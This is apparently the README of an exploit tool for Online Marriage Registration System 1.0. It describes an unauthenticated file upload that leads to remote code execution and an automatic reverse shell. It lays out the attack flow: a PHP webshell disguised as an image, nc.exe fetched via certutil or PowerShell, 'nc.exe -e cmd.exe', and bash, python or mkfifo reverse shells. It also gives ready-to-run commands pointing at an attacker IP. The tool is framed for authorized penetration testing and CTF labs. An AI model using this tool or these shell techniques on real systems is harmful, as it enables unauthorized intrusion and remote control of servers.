Share
## https://sploitus.com/exploit?id=8E66CCC1-8F77-59F2-B166-F0AA094E7487
# OMRS โ€” Online Marriage Registration System 1.0 โ€” RCE & Auto Reverse Shell

```
  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
 โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•
 โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
 โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘
  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ•šโ•โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘
  โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•     โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•
  OMRS RCE & Auto ReverseShell v1.0
                     Author : 4nuxd
```

> Automated exploit for **CVE โ€” Online Marriage Registration System 1.0**  
> Unauthenticated file upload โ†’ RCE โ†’ Auto reverse shell (Windows & Linux targets)

---

## Features

- Auto register & login (or reuse existing account with `--no-register`)
- Upload PHP webshell bypassing file type checks
- Auto-detect uploaded shell via directory diff
- Execute single commands (`-c`) or drop into full reverse shell (`-L -P`)
- **Windows target** โ€” downloads `nc.exe` via certutil/PowerShell, executes `nc.exe -e cmd.exe`, falls back to PowerShell b64
- **Linux target** โ€” tries bash TCP, python3, nc mkfifo, nc -e in sequence, auto PTY upgrade
- Clean interactive shell with visible input, echo suppression, and Ctrl+C support
- Built-in HTTP server to serve `nc.exe` automatically
- Proxychains compatible

---

## Requirements

```bash
pip install requests
```

For Windows targets (optional but recommended):
```bash
sudo apt install windows-binaries
```

---

## Usage

```
python3 oms.py -u  [-m MOBILE] [-p PASSWORD] [-L LHOST] [-P LPORT] [--os linux|windows] [OPTIONS]
```

### Arguments

| Flag | Description |
|------|-------------|
| `-u` | Target URL (e.g. `http://192.168.1.1/`) |
| `-m` | Mobile number for registration/login |
| `-p` | Password for registration/login |
| `-L` | Your tun0/attacker IP (for reverse shell) |
| `-P` | Listener port |
| `-c` | Run a single command and exit |
| `--os` | Target OS: `linux` or `windows` (default: `linux`) |
| `--no-register` | Skip registration, use existing account |
| `--http-port` | Port to serve nc.exe on (default: `8080`) |

---

## Examples

### Single command
```bash
python3 oms.py -u http://192.168.1.100/ -m 9999999999 -p pass123 -c "whoami" --os windows
```

### Reverse shell โ€” Linux target
```bash
python3 oms.py -u http://192.168.1.100/ -m 9999999999 -p pass123 -L 10.10.14.44 -P 4444 --os linux
```

### Reverse shell โ€” Windows target
```bash
python3 oms.py -u http://192.168.1.100/ -m 9999999999 -p pass123 -L 10.10.14.44 -P 9001 --os windows
```

### Through proxychains (e.g. HTB)
```bash
proxychains python3 oms.py -u http://172.16.1.102/ -m 9999999999 -p 4nuxd -L 10.10.14.44 -P 9001 --os windows --no-register
```

---

## How It Works

```
1. Register / login  โ†’  obtain PHPSESSID
2. Upload shell.php  โ†’  disguised as image via marriage form
3. Dir diff          โ†’  detect uploaded filename from /user/images listing
4. Verify RCE        โ†’  whoami / id
5. Trigger payload   โ†’  nc.exe (Windows) or bash/python (Linux)
6. Catch shell       โ†’  interactive cmd.exe or PTY bash
```

---

## Windows Shell Flow

```
certutil  โ”€โ”€โ†’  download nc.exe to C:\Windows\Temp\
PowerShell โ”€โ”€โ†’  download nc.exe (fallback)
nc.exe -e cmd.exe  โ”€โ”€โ†’  connect back
PowerShell b64  โ”€โ”€โ†’  final fallback
```

---

## Tested On

| Target | OS | Status |
|--------|----|--------|
| HTB Dante โ€” `dante-ws03` | Windows 10 (10.0.19042) | โœ… |
| OMRS 1.0 default install | Linux / Windows | โœ… |

---

## Disclaimer

This tool is for **authorized penetration testing and CTF purposes only**.  
Do not use against systems you do not have explicit permission to test.  
The author is not responsible for any misuse.

---

## Author

**4nuxd** โ€” [github.com/4nuxd](https://github.com/4nuxd)